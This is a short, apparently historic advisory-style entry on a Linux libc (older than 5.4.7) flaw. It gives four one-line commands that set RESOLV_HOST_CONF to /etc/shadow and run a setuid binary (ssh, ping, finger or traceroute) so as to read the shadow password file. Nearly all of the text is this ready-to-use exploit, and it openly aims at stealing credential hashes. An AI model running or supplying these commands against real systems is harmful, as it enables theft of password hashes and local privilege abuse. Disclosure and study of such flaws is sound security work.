Linux (using libc.so older than 5.4.7)

Exploit:

    This vulnerability gives you opportunity  to read any file and  so
    grab  that  shadow!    Also  requires   ssh,  ping,  finger,   and
    traceroute..  all must be suid 0.  Note that any of the  following
    will work individually, so you don't need all 4:

        export RESOLV_HOST_CONF=/etc/shadow; ssh asdf
        export RESOLV_HOST_CONF=/etc/shadow; ping asdf
        export RESOLV_HOST_CONF=/etc/shadow; finger asdf
        export RESOLV_HOST_CONF=/etc/shadow; traceroute asdf